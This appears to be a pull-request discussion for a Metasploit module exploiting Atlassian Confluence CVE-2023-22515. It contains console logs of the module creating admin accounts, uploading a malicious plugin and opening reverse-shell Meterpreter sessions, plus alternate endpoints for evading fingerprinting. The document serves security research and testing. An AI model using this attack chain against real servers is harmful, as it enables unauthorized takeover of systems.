CVE-2023-22515 - Atlassian Confluence unauthenticated RCE exploit module

[sfewer-r7]

This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP
parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for
Java objects to be modified at run time. The exploit will create a new administrator user and upload a
malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,
8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.

For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Atlassian Confluence 8.5.1
[*] Setting the application configuration's setupComplete to false via endpoint: /server-info.action
[*] Creating a new administrator user account...
[*] Created zskghlfv:NDqbcj4N
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Triggering payload...
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:56898) at 2023-10-16 20:41:57 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 10.0 (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/windows
meterpreter > pwd
C:\Program Files\Atlassian\Confluence
meterpreter > 

[jvoisin]

There was already a pull-request for this exploit: #18447 :/

[jvoisin]

Are there other possible endpoints?

[sfewer-r7]

Yes, due to the nature of the vuln there are likely numerous endpoints that can be targeted, for example:

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > set CONFLUENCE_TARGET_ENDPOINT /ajax/spaceavailable.action
CONFLUENCE_TARGET_ENDPOINT => /ajax/spaceavailable.action
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Setting the application configuration's setupComplete to false via endpoint: /ajax/spaceavailable.action
[*] Creating a new administrator user account...
[*] Created fuhghwol:I2WHP3At
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Triggering payload...
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 192.168.86.50
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.50:62207) at 2023-10-17 09:12:53 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.86.50 - Meterpreter session 4 closed.  Reason: User exit
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > 

[jvoisin]

It might be nice/interesting to provide a small list of possible ones I think, to make fingerprinting harder.

[sfewer-r7]

I added some extra documentation via c63aaba which mentions the other endpoint showed above.

[jvoisin]

Suggested change

	'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
	'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',

• +: Returns the concatenation of self and a given other string.
• <<: <<: Returns self concatenated with a given string or integer.

so I guess it's a matter of taste, but I think™ that people are more used to + for string concatenation than <<, especially given that the later is usually used to append a single element to an array.

[sfewer-r7]

My understanding is that in Ruby the << operator is faster, and so is the generally the preferred operator to concat two strings. Happy to change this if using + is the best practice.

[adfoster-r7]

<< is faster, but also the source of multiple bugs in framework 😄

It also stops us from enabling frozen strings globally, which could help reduce object allocations https://www.mikeperham.com/2018/02/28/ruby-optimization-with-one-magic-comment/

[sfewer-r7]

Thanks Alan, sounds like + should be the preferred operator so, I have done this via 34107e4

[sempervictus]

This comes up every few years, under various guises; and while i'm all for reducing allocations... + actually creates them (or did, anyway - a bit behind on my RubyVM-fu). Using << appends the contents of the right buffer to that on the left (eventually meaning "scatter-gather addition of existing SG buffer" under Linux anyway) whereas + creates a new buffer copying both sides into it and then hopefully deallocating the sources. Up here in Msf it might not be as noticeable, but down in Rex it can get pretty bad if you have a lot of IO and under memory pressure against various forms of GC. Back in the RBX days when VM instrumentation was "cool," we actually saw this effect pretty clearly during my machinations with rex-guts-n-stuff

[jvoisin]

Would it be worth adding a rubocop/msftidy rule to catch this?

[sfewer-r7]

Would it be worth adding a rubocop/msftidy rule to catch this?

Sounds like a great idea to me

[jvoisin]

Would it be possible for the plugin to delete the admin?

[cdelafuente-r7]

I haven't looked into this option too much, but it looks like there is no command line to interact with Confluence directly. The only way would be to delete the user directly from the database and there is high probability this would result in a corrupted database and break everything.

[sfewer-r7]

There was already a pull-request for this exploit: #18447 :/

Hi @jvoisin , #18447 is for an axillary module (not an exploit) to create a new admin account, whilst this pull request is for an exploit module to run a payload; both leverage the same vuln for different purposes. I don't see a problem having different module types covering the same CVE. Another example of this in the framework is the Adobe ColdFusion vuln CVE-2023-26360, whereby we have an auxiliary module and an exploit module for the same CVE.

[sempervictus]

@sfewer-r7 - thanks. Must feel good to finally give some pain back to that accursed thing 😉

Far as the aux and exploit module... this is why we have application and protocol specific mixins IMO. When two modules start doing similar things, that's usually when its time to review their commonalities and extract them to a mixin which also formalizes the datastore options for that context (see AWS module mess for why thats good).

[cdelafuente-r7]

Thanks @sfewer-r7 for this great module and the related research! I just left a few suggestions, but otherwise, it looks good to me. I tested against version 8.5.1 installed on Windows 11 and it works great.

[cdelafuente-r7]

Thanks @sfewer-r7 ! Everything looks good to me now. I tested against version 8.5.1 installed on Windows 11 and verified I got a session. I'll go ahead and land it.

• Example output

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > run verbose=true lhost=192.168.100.1 rhosts=192.168.100.33

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Atlassian Confluence 8.5.1
[*] Setting the application configuration's setupComplete to false via endpoint: /server-info.action
[*] Creating a new administrator user account...
[*] Created dsrrlgaf:x4nq1Ill
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Triggering payload...
[*] Sending stage (57692 bytes) to 192.168.100.33
[*] Deleting plugin...
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.33:53043) at 2023-10-19 10:09:34 +0200

meterpreter > getuid
Server username: DESKTOP-26CQRHP$
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

[sfewer-r7]

Thank you @cdelafuente-r7 and @jvoisin for the review, and thanks @adfoster-r7 and @sempervictus for the insights into string concatenation :)

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware and uploading a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created. This would require a manual clean up.

[grantwillcoxh3ai]

@stephenfewer Won't this specifically exclude the edge cases such as 8.0.0 and 8.3.2 which are also technically vulnerable? Same for 8.4.0 and 8.4.2, and 8.5.0 and 8.5.1.

[sfewer-r7]

Hi @grantwillcoxh3ai, in my testing between? will include the min and max version as part of the range check, so the check routine should work as expected. I was testing against 8.5.1 (one of the edge cases you mention) and the check was successful.